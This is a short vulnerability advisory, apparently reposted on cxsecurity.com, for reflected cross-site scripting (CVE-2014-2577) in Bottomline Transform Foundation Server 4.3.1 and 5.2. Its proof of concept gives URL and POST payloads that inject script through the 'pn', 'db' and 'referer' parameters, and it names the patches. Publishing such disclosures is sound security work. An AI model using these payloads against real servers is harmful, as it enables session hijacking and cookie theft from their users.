Transform Foundation Server 4.3.1 / 5.2 Cross Site Scripting

2014.06.04
Credit: Francisco
Risk: Low
Local: No
Remote: Yes
CVE: CVE-2014-2577
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

I. VULNERABILITY ------------------------- Reflected XSS Attacks vulnerabilities in Transform Foundation server 4.3.1 and 5.2 from Bottomline Technologies II. BACKGROUND ------------------------- Bottomline offers powerful, next-generation electronic document solutions for formatting, personalizing and delivering ERP and business application output. III. DESCRIPTION ------------------------- Has been detected several Reflected XSS vulnerability in Transform Foundation server 4.3.1 and 5.2 1. XSS on GET parameters: http://XXXXXXXXX/TransformContentCenter/index.fsp/document.pdf?pn="XSS CODE" http://XXXXXXXXXXXXX/"XSS CODE"server-status.cgi 2. XSS on POST parameters: URL: XXXXXXXXX/TransformContentCenter/index.fsp/index.fsp PARAMETERS: db="XSS CODE" referer="XSS CODE" IV. PROOF OF CONCEPT ------------------------- GET: The application does not validate the parameter "pn" correctly. http://XXXXXXXXX/TransformContentCenter/index.fsp/document.pdf?pn=</i></p><BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')> http://XXXXXXXXXXXXX/<BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')>server-status.cgi POST: The application does not validate the parameter "db" and "rerferer" correctly. XXXXXXXXX/TransformContentCenter/index.fsp/index.fsp db=</td></tr><BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar')> and referer=</td></tr><BODY ONLOAD=alert('Hacked-by-J.Fco-Bolivar') V. BUSINESS IMPACT ------------------------- An attacker can execute arbitrary HTML or script code in a targeted user's browser, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser allowing Cookie Theft/Session Hijacking, thus enabling full access the box. VI. SYSTEMS AFFECTED ------------------------- Transform Foundation Server 4.3.1 Transform Foundation Server 5.2 VII. SOLUTION ------------------------- Patches released by the vendor available on customer portal and information available here: Transform Foundation Server 4.3.1 Patch 8: http://www.pdf-archive.com/2014/06/03/tf52patch7releasenotes/preview/page/14/ SF2351630 SF2364411 SF2391461 Transform Foundation Server 5.2 Patch 7: http://www.pdf-archive.com/2014/06/03/tf52patch7releasenotes/preview/page/14/ SF2351630 SF2364411 SF2391461 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2577 Detected and reported by J. Francisco Bolivar (es.linkedin.com/in/jfbolivar/ )


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top